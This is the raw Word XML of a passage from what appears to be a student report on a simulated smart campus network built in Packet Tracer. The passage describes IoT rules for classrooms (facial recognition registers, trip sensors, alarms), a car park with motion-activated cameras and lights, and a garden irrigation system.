                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3206125" cy="1058962"/>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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E8D9F" w14:textId="26ED394D" w:rsidR="00D87B36" w:rsidRDefault="00B01893" w:rsidP="00F16F30">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: UWTSD Smart IoT Classrooms </w:t>
      </w:r>
      <w:r w:rsidR="00C408FB">
        <w:t>Segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ABED15" w14:textId="0F261B11" w:rsidR="00F16F30" w:rsidRDefault="00F16F30" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The same IoT devices that were implemented and programmed </w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve">at the IoT datacentre registration server </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">within the smart office segment have also been utilised </w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve">and linked by a set of rules </w:t>
      </w:r>
      <w:r>
        <w:t>within the same way in this segment of the network, along with;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766851ED" w14:textId="373775B8" w:rsidR="00F16F30" w:rsidRPr="00F16F30" w:rsidRDefault="00F16F30" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B79A6A" w14:textId="391175B8" w:rsidR="00F16F30" w:rsidRDefault="00F16F30" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16F30">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Facial Recognition Camera and Motion Detector;</w:t>
      </w:r>
      <w:r w:rsidR="00130EAB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130EAB" w:rsidRPr="00130EAB">
        <w:t>These devices have been programmed</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> at the IoT datacentre by that they are linked by a set of rules</w:t>
      </w:r>
      <w:r w:rsidR="00130EAB" w:rsidRPr="00130EAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130EAB">
        <w:t>so that when motion is detected within the room the facial recognition camera will analyse the image taken from a person face and log them as in that room at the registration server within the cloud datacentre. The application of linking these sensors can be utilised to automate the student register and also detect who is in the building and where during an emergency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DCA432" w14:textId="4893FB70" w:rsidR="00130EAB" w:rsidRDefault="00130EAB" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7021D964" w14:textId="3AB934EE" w:rsidR="00130EAB" w:rsidRDefault="00130EAB" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>PT does not support the application mentioned above so has not been configured</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> but an example of the cameras and motion sensor being linked together by a set of rules</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F">
        <w:t>. These rules</w:t>
      </w:r>
      <w:r w:rsidR="0021356E">
        <w:t xml:space="preserve"> can be found in </w:t>
      </w:r>
      <w:r w:rsidR="0021356E" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="0021356E" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0456DB0E" w14:textId="131E6754" w:rsidR="0021356E" w:rsidRDefault="0021356E" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582D67D7" w14:textId="77777777" w:rsidR="0021356E" w:rsidRDefault="0021356E" w:rsidP="0021356E">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01B8D190" wp14:editId="099B4782">
            <wp:extent cx="3206115" cy="1333500"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="190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206115" cy="1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D25E75" w14:textId="2F4F75C8" w:rsidR="008927B1" w:rsidRDefault="0021356E" w:rsidP="0021356E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Facial Recognition Camera and Motion Sensor Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FD379" w14:textId="24ABC8F1" w:rsidR="008927B1" w:rsidRPr="00730E3F" w:rsidRDefault="008927B1" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008927B1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Laser Trip Sensors, Security Cameras and Security Alarms;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t>These devices have been programmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t>on the perimeter of each of the classroom doors</w:t>
      </w:r>
      <w:r w:rsidR="007C5A35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t xml:space="preserve">to detect unauthorised entry to the University when it is closed. The trip wire activates the security alarms around the </w:t>
      </w:r>
      <w:r w:rsidR="007C5A35">
        <w:t xml:space="preserve">perimeter of the </w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t>building and the security cameras</w:t>
      </w:r>
      <w:r w:rsidR="006F0ED9">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t xml:space="preserve"> along with notifying the external security company that monitor the university </w:t>
      </w:r>
      <w:r w:rsidR="00AB69FC">
        <w:t xml:space="preserve">from the IoT cloud datacentre </w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t xml:space="preserve">so </w:t>
      </w:r>
      <w:r w:rsidR="007C5A35">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidRPr="008927B1">
        <w:t>they can investigate.</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F">
        <w:t xml:space="preserve"> These rules can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FABC9E" w14:textId="5322F9F9" w:rsidR="00B84AAE" w:rsidRDefault="00B84AAE" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEFF895" w14:textId="77777777" w:rsidR="00B84AAE" w:rsidRDefault="00B84AAE" w:rsidP="00B84AAE">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B6090FE" wp14:editId="43A8ADFC">
            <wp:extent cx="3206115" cy="1605915"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="133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206115" cy="1605915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA9F370" w14:textId="7E5584F8" w:rsidR="00C03291" w:rsidRDefault="00B84AAE" w:rsidP="00B84AAE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Fi</w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve">gure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Classroom Door Physical Security Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044BEDCA" w14:textId="6B19716C" w:rsidR="00B84AAE" w:rsidRDefault="00B84AAE" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>PT does not allow the security alarms to be linked to the trip sensor, so it has not been included within the above rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D651F27" w14:textId="77777777" w:rsidR="00B84AAE" w:rsidRDefault="00B84AAE" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045E8CF7" w14:textId="675944ED" w:rsidR="00C03291" w:rsidRPr="001A61A0" w:rsidRDefault="00C03291" w:rsidP="00C03291">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>RF-ID doors have also been utilised within each of the classrooms for physical security access into the building from and also between the two classrooms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350ECEBA" w14:textId="77777777" w:rsidR="00F16F30" w:rsidRPr="00F16F30" w:rsidRDefault="00F16F30" w:rsidP="00F16F30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CE558B" w14:textId="00BC7C12" w:rsidR="00FC05B5" w:rsidRDefault="00654B17" w:rsidP="00FC05B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>802.11</w:t>
      </w:r>
      <w:r w:rsidR="00CE3B36">
        <w:t xml:space="preserve"> 5G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WLAN Smart Carpark</w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t xml:space="preserve"> – Access Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749BFD3C" w14:textId="64A15BD5" w:rsidR="00FC05B5" w:rsidRDefault="00FC05B5" w:rsidP="00FC05B5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The smart car park was implemented by utilising 4 x IoT street lights and 2 x IoT security cameras, that were connected utilising 802.11 wireless </w:t>
      </w:r>
      <w:r w:rsidR="000A584A">
        <w:t>interfaces</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089993A6" w14:textId="77777777" w:rsidR="00FC05B5" w:rsidRDefault="00FC05B5" w:rsidP="00FC05B5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25EA2612" w14:textId="77777777" w:rsidR="00FC05B5" w:rsidRDefault="00FC05B5" w:rsidP="00FC05B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="336F033D" wp14:editId="77726D57">
            <wp:extent cx="3273425" cy="2647950"/>
            <wp:effectExtent l="19050" t="19050" r="22225"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3">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="-1106" t="-1158" r="-1218" b="-1318"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3274793" cy="2649057"/>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30E88A3A" w14:textId="1C8D92FB" w:rsidR="00FC05B5" w:rsidRDefault="00FC05B5" w:rsidP="00FC05B5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: UWTSD Smart IoT Carpark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A34BC" w14:textId="4CF59D7C" w:rsidR="00730E3F" w:rsidRDefault="000A584A" w:rsidP="00730E3F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The security cameras were programmed to the sensor at the IoT cloud datacentre</w:t>
      </w:r>
      <w:r w:rsidR="00416109">
        <w:t xml:space="preserve"> with the rules set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to activate (switch on) when motion was detected and deactivate after 5minutes of no motion being detected within the car park</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F">
        <w:t xml:space="preserve">. These rules can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F42D046" w14:textId="613CD476" w:rsidR="00416109" w:rsidRPr="00730E3F" w:rsidRDefault="00416109" w:rsidP="00FC05B5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264B9BC4" w14:textId="77777777" w:rsidR="004972EB" w:rsidRDefault="00416109" w:rsidP="004972EB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C6D618" wp14:editId="7BA5A77B">
            <wp:extent cx="3206115" cy="2525395"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="273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206115" cy="2525395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5AD2E" w14:textId="7198EE6E" w:rsidR="000A584A" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Carpark Security Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A8D60" w14:textId="4BC06790" w:rsidR="00416109" w:rsidRDefault="00F84047" w:rsidP="00FC05B5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By default, PT </w:t>
      </w:r>
      <w:r w:rsidR="00730E3F">
        <w:t>automates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00730E3F">
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r>
        <w:t>street light devices to turn on at night time</w:t>
      </w:r>
      <w:r w:rsidR="00730E3F">
        <w:t xml:space="preserve">. This process </w:t>
      </w:r>
      <w:r>
        <w:t>is regulated by the Network Time Protocol (NTP) server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7050E" w14:textId="77777777" w:rsidR="00F84047" w:rsidRPr="00FC05B5" w:rsidRDefault="00F84047" w:rsidP="00FC05B5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DE6710" w14:textId="117EE9F9" w:rsidR="00D87B36" w:rsidRDefault="00654B17" w:rsidP="00D87B36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>802.11</w:t>
      </w:r>
      <w:r w:rsidR="0083569F">
        <w:t xml:space="preserve"> 5G</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WLAN ‘Tranquillity’ Garden</w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t xml:space="preserve"> – Access Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008A886B" w14:textId="77777777" w:rsidR="000A584A" w:rsidRPr="000A584A" w:rsidRDefault="000A584A" w:rsidP="000A584A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DE8110" w14:textId="2D6CC915" w:rsidR="00FE6E2C" w:rsidRDefault="000A584A" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The ‘Tranquillity’ smart IoT garden was designed by implementing 4 x street lights</w:t>
      </w:r>
      <w:r w:rsidR="00416109">
        <w:t xml:space="preserve">, 2 x solar panels, 4 x garden sprinklers, 1 x water drain, 1 x plant and soil water monitor and 1 x air humidity monitor, illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidR="00416109">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F969BE7" w14:textId="7FE7E7CC" w:rsidR="000A584A" w:rsidRDefault="000A584A" w:rsidP="00D87B36">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A171D42" w14:textId="77777777" w:rsidR="004972EB" w:rsidRDefault="000A584A" w:rsidP="004972EB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00804A51" wp14:editId="55451244">
            <wp:extent cx="3270616" cy="2623457"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="2476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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="-2037" t="-1499" b="-1736"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3271429" cy="2624109"/>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3D2B2E0C" w14:textId="6E3AFDFC" w:rsidR="00416109" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: UWTSD Smart Campus 'Tranquillity' Garden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C43C8F" w14:textId="58CE0FFD" w:rsidR="00BA3675" w:rsidRDefault="00730E3F" w:rsidP="00BA3675">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Plant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Soil Water Level Monitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Garden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sprinklers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> and Water Drain</w:t>
      </w:r>
      <w:r w:rsidRPr="00730E3F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">These IoT smart devices have been programmed at the IoT datacentre registration server so that they are linked by a set of rules. The rules state that ‘if’ the plant and soil water levels are </w:t>
      </w:r>
      <w:r w:rsidR="002F52B1">
        <w:t>less than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1cm then the sprinklers are to be activated and the </w:t>
      </w:r>
      <w:r w:rsidR="002F52B1">
        <w:t xml:space="preserve">water </w:t>
      </w:r>
      <w:r>
        <w:t>drain open</w:t>
      </w:r>
      <w:r w:rsidR="00EB2085">
        <w:t>ed to prevent flooding of grass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> until the water level is </w:t>
      </w:r>
      <w:r w:rsidR="002F52B1">
        <w:t>equal to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1cm. </w:t>
      </w:r>
      <w:r w:rsidR="00BA3675">
        <w:t xml:space="preserve">These rules can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00BA3675" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidR="00BA3675" w:rsidRPr="0021356E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF69F87" w14:textId="77777777" w:rsidR="004972EB" w:rsidRDefault="004972EB" w:rsidP="00BA3675">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="477FA283" w14:textId="77777777" w:rsidR="002F52B1" w:rsidRPr="002F52B1" w:rsidRDefault="002F52B1" w:rsidP="00BA3675">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E47829" w14:textId="77777777" w:rsidR="002F52B1" w:rsidRDefault="002F52B1" w:rsidP="002F52B1">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="020A419A" wp14:editId="01CE87BA">
            <wp:extent cx="3200400" cy="2520315"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="133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200400" cy="2520315"/>
